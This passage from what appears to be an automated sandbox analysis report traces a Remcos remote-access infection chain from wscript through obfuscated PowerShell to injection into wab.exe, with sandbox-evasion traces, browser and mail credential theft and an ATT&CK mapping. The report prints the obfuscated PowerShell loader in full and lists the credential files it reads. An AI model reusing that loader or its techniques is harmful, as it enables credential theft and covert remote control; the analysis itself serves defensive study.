                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923AFC4 push cs; retf 14_2_0923AFD6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923E2DC push ds; iretd 14_2_0923E2DD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572806 push ecx; ret 17_2_24572819
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24581219 push esp; iretd 17_2_2458121A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044F0862 push ebp; ret 17_2_044F0834
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EF155 push eax; iretd 17_2_044EF15E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EB9E0 push edx; ret 17_2_044EB9E8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044E5D96 push edx; ret 17_2_044E5D9D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EE2DC push ds; iretd 17_2_044EE2DD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EAF63 push cs; retf 17_2_044EAFD6
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044F0709 push 8FC93C6Fh; iretd 17_2_044F070E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EAFC4 push cs; retf 17_2_044EAFD6
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044F07E2 push ebp; ret 17_2_044F0834
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044E039E push eax; iretd 17_2_044E039F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EC3A7 pushad ; iretd 17_2_044EC3B2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_044EAFB5 push ss; retf 17_2_044EAFC2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044693D push ecx; ret 20_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,23_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 70BDF8D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6162
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3647
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7554
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1989
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 431
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 9064
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1768
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
                Source: C:\Windows\System32\wscript.exe TID: 6624Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep count: 7554 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 1989 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7888Thread sleep count: 229 > 30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7888Thread sleep time: -114500s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep count: 431 > 30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep time: -1293000s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep count: 9064 > 30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7892Thread sleep time: -27192000s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_245710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_245710F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24576580 FindFirstFileExA,17_2_24576580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00418981 memset,GetSystemInfo,20_2_00418981
                Source: wscript.exe, 00000000.00000002.1251636537.0000029D2C54C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0E
                Source: wscript.exe, 00000000.00000003.1240505483.0000029D2C4A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250511137.0000029D2C446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241291623.0000029D2C458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241168691.0000029D2C431000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251482657.0000029D2C446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251127481.0000029D2A500000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251535696.0000029D2C496000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241392491.0000029D2C4A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250015432.0000029D2C496000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2004357500.0000019EF5F26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWre%SystemRoot%\system32\mswsock.dllEndrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnViv
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_23-34118
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24573856 GetLastError,___vcrt_FlsGetValue,___vcrt_FlsSetValue,LdrInitializeThunk,___vcrt_FlsSetValue,___vcrt_FlsSetValue,SetLastError,17_2_24573856
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_245760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_245760E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,20_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24574AB4 mov eax, dword ptr fs:[00000030h]17_2_24574AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2457724E GetProcessHeap,17_2_2457724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_245760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_245760E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_24572639
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_24572B1C

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: amsi64_720.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 44E0000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327F894
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle 
';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik 
iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"
                Source: wab.exe, 00000011.00000003.1811557960.0000000008B35000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                Source: wab.exe, 00000011.00000003.1811557960.0000000008B35000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager;g
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_24572933 cpuid 17_2_24572933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_24572264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 17_2_24572264
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 23_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 23_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 20_2_0041739B GetVersionExW, 20_2_0041739B
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: ESMTPPassword 23_2_004033F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 23_2_00402DB3
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 23_2_00402DB3
                Source: Yara match | File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                MITRE ATT&CK Matrix (listed by tactic; a bracketed number is the count badge shown next to that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Scripting [221]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation [1]; Native API [11]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [212]; PowerShell [2]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: Scripting [221]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [212]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [31]; Access Token Manipulation [1]; Process Injection [212]; HTML Smuggling
